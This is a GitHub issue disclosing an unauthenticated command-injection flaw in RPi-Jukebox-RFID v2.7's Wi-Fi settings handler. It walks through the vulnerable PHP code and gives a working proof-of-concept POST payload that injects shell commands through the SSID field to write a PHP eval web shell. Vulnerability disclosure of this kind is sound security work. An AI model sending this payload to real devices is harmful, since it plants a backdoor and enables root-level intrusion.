๐ | RPi-Jukebox-RFID V2.7_RCE_6
xjzzzxx opened this issue ยท 0 comments
Version
v2.7.0
Branch
released
OS
ubuntu 22
Pi model
unknown
Hardware
No response
What happened?
Hello,
I would like to report for a RCE vulnerability in RPi-Jukebox-RFID-v2.7(No permissions required)
Analysis
The path of the vulnerability: htdocs\inc.setWifi.php
# htdocs\inc.setWifi.php
if(isset($_POST["submitWifi"]) && $_POST["submitWifi"] == "submit") { // Line 8(Check point)
$exec = "bash -e <<'END'\n";
$exec .= "source ".$conf['scripts_abs']."/helperscripts/inc.networkHelper.sh\n";
$exec .= "clear_wireless_networks\n";
$tempPOST = $_POST; // Line 14 (Source)
$_POST=array(); //clear
foreach ( $tempPOST as $post_key => $post_value ) {
unset($temp_ssid);
unset($temp_pass);
unset($temp_prio);
if ( substr(trim($post_key), 0, 9) == "WIFIssid_" ) { // Line 20(check for temp_ssid)
$temp_ssid = trim($post_value);
$post_key = "WIFIpass_".substr(trim($post_key), 9); // Line 22(check for temp_pass)
$post_value = $tempPOST[$post_key];
$temp_pass = trim($post_value);
$post_key = "WIFIprio_".substr(trim($post_key), 9); // Line 25(check for temp_prio)
$post_value = $tempPOST[$post_key];
$temp_prio = trim($post_value);
if (isset($temp_ssid) && $temp_ssid != "" && isset($temp_pass) && strlen($temp_pass) >= 8) { // Line 28
if(!isset($temp_prio) || !is_numeric($temp_prio)) {
$temp_prio = 0;
}
$exec .= "add_wireless_network wlan0 ".$temp_ssid." ".$temp_pass." ".$temp_prio."\n";
}
}
}
$exec .= "END\n";
exec("sudo bash -c '". $exec . "'"); // Line 38(Sink)
}
Source from Line 14 ($_POST
) .
And then there is a check point(Line 8) ,which we should set $_POST['submitWifi'] = submit
to bypass.
Finally, the sink point executed a complex concatenated command(Line 38).
Let's briefly analyze this splicing command:
sudo bash -c 'bash -e <<'END'
source ".$conf['scripts_abs']."/helperscripts/inc.networkHelper.sh
clear_wireless_networks
add_wireless_network wlan0 $temp_ssid $temp_pass $temp_prio
END
'z
We have three controllable variables($temp_ssid, $temp_pass, $temp_prio
), but they need to meet the corresponding checks(Line 20, Line 22, Line25 and Line 28). It can be seen that the condition we need to meet is to use KEY values with prefixes WIFIssid_
, WIFIpass_
, and WIFIprio_
, and strlen($temp_pass) >= 8
.
In addition, since we are using bash -e
mode, we must ensure that all commands before controllable points can be executed correctly. That is, we need to find the correct value for $conf['scripts_abs']
which can be found in the htdocs/settings.php
# htdocs/settings.php
include("inc.header.php"); // Line 3 (init $conf['scripts_abs'])
...
include("inc.setWifi.php"); // Line 191
So we need to POST htdocs/settings. php
Poc
POST /htdocs/settings.php
Data:
submitWifi=submit&WIFIssid_123=+%7c%7c+echo+%22%3c%3fphp+%40eval(%5c%5c%5c%24_POST%5b%5c%22shell6%5c%22%5d)%3b+%3f%3e%22+%3e+.%2fshell6.php+&WIFIpass_123=%7c%7c+echo+%221%22+%7c%7c+&WIFIprio_123=1
Here is the version without url encoding for ease of understanding:
submitWifi=submit&WIFIssid_123= || echo "<?php @eval(\\\$_POST[\"shell6\"]); ?>" > ./shell6.php &WIFIpass_123=|| echo "1" || &WIFIprio_123=1
The concatenated command:
sudo bash -c 'bash -e <<'END'
source /www/admin/cms.jukebox27.com_80/wwwroot/scripts/helperscripts/inc.networkHelper.sh
clear_wireless_networks
add_wireless_network wlan0 || echo "<?php @eval(\\\$_POST[\"shell6\"]); ?>" > ./shell6.php || echo "1" || 1
END
'
Manual verification
Logs
No response
Configuration
No response
More info
No response